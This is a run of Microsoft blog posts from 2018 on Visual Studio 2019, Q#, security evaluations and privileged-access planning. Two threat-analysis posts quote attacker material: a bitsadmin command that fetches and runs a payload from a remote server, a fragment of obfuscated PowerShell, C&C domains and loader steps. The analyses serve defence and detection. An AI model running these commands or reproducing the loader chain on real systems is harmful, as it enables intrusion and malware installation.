Today, in the Microsoft Connect(); 2018 keynote, Scott Guthrie announced the availability of Visual Studio 2019 Preview 1. This is the first preview of the next major version of Visual Studio. In this Preview, we’ve focused on a few key areas, such as making it faster to open and work with projects stored in git repositories, improving IntelliSense with Artificial Intelligence (AI) (a feature we call Visual Studio IntelliCode), and making it easier to collaborate with your teammates by integrating Live Share. With each preview, we’ll be adding capabilities, improving performance, and refining the user experience, and we absolutely want your feedback.

For a quick overview of the new functionality, you can keep reading this blog, or if you want a video overview, check out our team member Allison’s introduction to Visual Studio 2019. But before you do either, make sure to kick off the download.

Enabling you to focus on your work

Right off the bat, you’ll notice that Visual Studio 2019 opens with a new start window on launch. This experience is better designed to work with today’s Git repositories – whether local repos or online Git repos on GitHub, Azure Repos, or elsewhere. Of course, you can still open an existing project or solution or create a new one. (This experience is also coming soon to Visual Studio 2019 for Mac.) We’ll have a more detailed blog post on the new start window experience next week, which will also go into some of the research that supported this revamp.

Visual Studio 2019 start window

Visual Studio 2019 for Mac start window

Once you’re in the IDE, you’ll notice a few changes to the UI and UX of Visual Studio 2019. Jamie Young recently published a blog post with more detail on these changes, but to recap, they include a new product icon, a refreshed blue theme with small changes across the UI to create a cleaner interface, and a more compact title and menu bar – for which we’ve heard your feedback loud and clear and are working to further optimize.

In addition to the enhancements Jamie mentions, today we’re sharing the new search experience in Visual Studio 2019, which replaces the existing “Quick Launch” box. You can now search for settings, commands, and install options. The new search experience is also smarter, as it supports fuzzy string searching to help find what you are looking for even when misspelled.

The new search experience in Visual Studio 2019

When you’re coding, Visual Studio 2019 makes it easier to get your work done quickly.  We’ve started by focusing on code maintainability and consistency experiences in this preview. We’ve added new refactoring capabilities – such as changing for-loops to LINQ queries and converting tuples to named-structs – to make it even easier to keep your code in good shape. With the new document health indicator and code clean-up functionality, you can now easily identify and fix warnings and suggestions with the click of a button.

The document health indicator and code clean-up command

Common debugging task are also easier. You’ll immediately see that stepping performance is improved, allowing for a much smoother debugging experience. We’ve also added search capabilities to the Autos, Locals, and Watch windows helping you track down objects and values. Watch for a future blog post that goes deeper into the debugger improvements in Visual Studio 2019, including the new Time Travel Debugging for managed code feature (coming to a future Preview), updates to the Snapshot Debugger to target Azure Kubernetes Service (AKS) and Virtual Machine Scale Sets (VMSS), and better performance when debugging large C++ projects; thanks to an out-of-process 64-bit debugger.

Search in the Watch window

Helping your team work together

Building on the work we started in Visual Studio 2017, we’re improving Visual Studio IntelliCode, our context-aware and AI-powered IntelliSense, to enable training it on your own code repositories and share the results with your team. IntelliCode reduces the number of keystrokes you need since the completion lists are prioritized on the most common coding patterns for that API combined with the context of the code in your existing project. We’ll have a blog post on all the improvements in IntelliCode coming later this week, including more details on learning from your code, and C++ and XAML support being added for Visual Studio 2019.

Visual Studio IntelliCode using a trained model

Earlier this year, we introduced Visual Studio Live Share to help you collaborate in real-time with anyone across the globe using Visual Studio or Visual Studio Code. Live Share is installed by default with Visual Studio 2019, so you can immediately invite your teammates to join your coding session to take care of a bug or help make a quick change. You’ll also find it’s easier to start a session and view who you’re working within a dedicated space at the top-right of the user interface. We’ll also have a deeper-dive post on Visual Studio Live Share improvements in the next few days, including support for any project, app type, and language, Solution View for guests, and support for more collaboration scenarios.

Visual Studio Live Share integrated in Visual Studio 2019

Last, we’re introducing a brand-new pull request (PR) experience in Visual Studio 2019, which enables you to review, run, and even debug pull requests from your team without leaving the IDE. We support code in Azure Repos today but are going to expand to support GitHub and improve the overall experience. To get started, you can download the Pull Requests for Visual Studio extension from the Visual Studio Marketplace.

The new pull request experience in Visual Studio 2019

.NET Core 3 Preview 1

We also announced .NET Core 3 Preview 1 today, and Visual Studio 2019 will be the release to support building .NET Core 3 applications for any platform. Of course, we also continue to support and improve cross-platform C++ development, as well as .NET mobile development for iOS and Android with Xamarin.

.NET Core 3.0 development in Visual Studio 2019

Help us build the best Visual Studio yet

We are very thankful to have such an active community and can’t wait to hear what you think about Visual Studio 2019. Please help us make this the best Visual Studio yet by letting us know of any issues you run into by using the Report a Problem tool in Visual Studio. You can also head over to the Visual Studio Developer Community to track your issue or, even better, suggest a feature, ask questions, and find answers from others.

We will share more about the full feature set and SKU lineup of Visual Studio 2019 in the coming months as we release more previews. You can try Visual Studio 2019 side-by-side with your current installation of Visual Studio 2017, or if you want to give it a spin without installing it, check out the Visual Studio images on Azure.

I also want to take a moment to thank our vibrant extension ecosystem, who have made over 400 extensions available for Visual Studio 2019 Preview 1 already, and more are being added each day. You can find these extensions on the Visual Studio Marketplace.

Microsoft has always been a company with developers at the heart – we’re humbled that the community of users of the Visual Studio family has surpassed 12 million. We aim to make every second you spend coding more productive and delightful. Please continue to share your feedback on the preview for Visual Studio 2019 to help guide the future direction of the product so it becomes your favorite tool. Thank you!

John Montgomery, Director of Program Management for Visual Studio
@JohnMontJohn is responsible for product design and customer success for all of Visual Studio, C++, C#, VB, JavaScript, and .NET. John has been at Microsoft for 17 years, working in developer technologies the whole time.

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITREs evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, as part of the testing, all protection and prevention features were turned off. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATPs EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.
We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATPs capabilities to detect and expose attacker techniques. Below we highlight some of the acute attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques through APT3s attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with Suspicious sequence of exploration activities alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATPs Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATPs unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATPs preventive capabilities, like attack surface reduction and next-gen protection capabilities, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents to enable holistic response actions and build wider protections.

Windows Defender ATP’s best-in-class detection capabilities, as affirmed by MITRE, is amplified across Microsoft solutions through Microsoft Threat Protection, a comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.




Windows Defender ATP team




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



The post Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP appeared first on Microsoft Secure.

Categories: APT3, ATT&CK, BORON, cybersecurity, MITRE Tags:

Kicking off the Microsoft Graph Security Hackathon

December 3rd, 2018 No comments

Cybersecurity is one of the hottest sectors in tech with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions make it more difficultrather than easierto defend and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.


In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channelsgiving you the opportunity for your creative solutions to be known to the masses. The criteria for the judging will consist of the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging commences immediately after by our amazing judges. Well announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

December 3rd, 2018 No comments

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in emails, driving the blocking of said emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link on the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients machines.

Attack chain

Analysis of the campaign


The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:


When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack have the same file name, for example, ds7002.pdf,, and ds7002.lnk.


The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending 16,632 bytes.

Encoded content in the LNK file

The encoded payloadanother heavily obfuscated PowerShell scriptis decoded and executed:

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com (, cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a ReadWrite page for the second-stage payload
  2. Extract the second-stage payload as a resource
  3. Take a header that is baked into the first payload with a size 0xEF bytes
  4. Concatenate the header with the resource, starting at byte 0x12A.
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5.

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897
  2. Connecting to the pipe, write it global data with size 0x3FE00
  3. Implement a backdoor over the named pipe:

    1. Read from the pipe (maximum 0x3FE00 bytes) to an allocated buffer
    2. DeXOR the payload onto a new RW memory region, this time with a much simple XOR key: simple XORing every 4 bytes with 0x7CC2885F
    3. Turn the region to be RX
    4. Create a thread that starts running the payload’

The phase that writes to global data to the pipe actually writes a third payload. That payload is XORed with the same XORing algorithm used for reading. When decrypted, it forms a PE file with a Meterpreter header, interpreting instructions in the PE header and moving control to a reflective loader:

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked-in inside configuration information in the PE file. This configuration information is de-XORed at the third payload runtime:

The configuration information itself mostly contains C&C information:

CobaltStrike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in links in the emails, allowing us to successfully block campaign emailsincluding first-seen samplesand protect targeted customers. Three existing behavioral-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware.If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as maliciousthis is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack.To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting query can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
| where EventTime > ago(10d) 
| where RemoteUrl == "" 

//Query 3: Malicious PowerShell
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 

//Query 4: Malicious domain in default browser commandline
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change EventTime to focus on a different period.




Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team




Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf


  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com ( (first-stage C&C server)




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Qubits in Q#

December 1st, 2018 No comments

How should qubits be represented in a quantum programming language?

In the quantum circuit model, a quantum computation is represented as a sequence of operations, sometimes known as gates, applied to a set of qubits. This leads to pictures such as:

Teleportation quantum circuit

from Quantum Computation and Quantum Information by Nielsen and Chuang

In this picture, each horizontal line is a qubit, each box is an operation, and time flows from left to right.

When we want to design a programming language to express a quantum computation, the question naturally arises of whether qubits should be represented in the language, and if so, how. In the most naive model of such a picture, there would be a software entity that represented each horizontal line, with little or no accessible state other than perhaps a label, but there are other possibilities.

Quantum States as Linear Types

Quipper uses linear types to model quantum states, although it refers to the data type as Qubit. The intuition is that the no-cloning theorem prevents you from making a copy of the quantum state of a qubit, so it makes sense to use the type system to prevent you from making a copy of the software representation of quantum state. Linear types have proven useful in other contexts where copying the software representation of an entity would be bad, for instance in functional concurrent programming, so why not for quantum computing?

The argument for linear types is, as mentioned, that they reflect the no-cloning theorem in the language. The implication is that a software qubit represents a qubit state, rather than an actual object. The problem with this view is that, once entangled, it no longer makes sense to talk about the state of an individual qubit; that’s more or less exactly what being entangled means. To model this in software, an entangling gate such as a CNOT should take two single-qubit states as inputs and return a software entity that represents two-qubit state as output — as long as you never want to perform a CNOT on two qubits that are each entangled with other qubits.

The software entity as quantum state abstraction breaks down for two reasons:

  • because quantum computing works by applying operations to physical entities, not to quantum states, so the abstraction doesn’t correspond to operational reality; and
  • because in general there is no actual physical quantum state smaller than the state of the entire quantum computer, so the abstraction doesn’t correspond to physical reality.

Qubits as Opaque References

An alternate approach is to use an opaque data type that represents a reference to a specific two-state quantum system, whether physical or logical (error-corrected), on which operations such as `H` or `X` may be performed. This is an operational view of qubits: qubits are defined by what you can do to them. Both OpenQASM and Q# follow this model.

Quantum Computing is Computing by Side Effect

The representation used in Q# has the interesting implication that all of the actual quantum computing is done by side effect. There is no way to directly interact with the quantum state of the computer; it has no software representation at all. Instead, one performs operations on qubit entities that have the side effect of modifying the quantum state. Effectively, the quantum state of the computer is an opaque global variable that is inaccessible except through a small set of accessor primitives (measurements) — and even these accessors have side effects on the quantum state, and so are really “mutators with results” rather than true accessors.

In general programming, the use of side effects and global state is generally discouraged. For quantum computing, on the other hand, they seem to match the actual physical reality pretty well. For this reason, we decided that this abstraction was the right one to use in Q#.

This post is the first one in the Q# Advent Calendar 2018. Follow the calendar for other great posts!

Alan Geller, Software Architect, Quantum Software and Applications

Alan Geller is a software architect in the Quantum Architectures and Computation group at Microsoft. He is responsible for the overall software architecture for Q# and the Microsoft Quantum Development Kit, as well as other aspects of the Microsoft Quantum software program.

Categories: Q#, Quantum, Visual Studio Tags:

Secure your privileged administrative accounts with a phased roadmap

November 29th, 2018 No comments

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today as well as the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once weve identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are ), this post is designed to help. Ive shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we arent just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organizations systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:

    • Move beyond relying solely on passwords that are too often weak, or easily guessed and move to a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.

  • Reduce the attack surface:

    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.

  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, Ive included a diagram that shows how Microsoft protects itself. Youll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attackers eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which Ive included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable credential guard on Windows 10 workstations: This isolates secrets for legacy authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lowers the attack surface of domain and domain controller: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like unpatched vulnerabilities and exploiting configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

November 28th, 2018 No comments

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer have foothold on affected machines, returning machines to normal working state. Once the threat is remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed to be for meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines at the top of the queue, helping ensure security operations teams to immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.

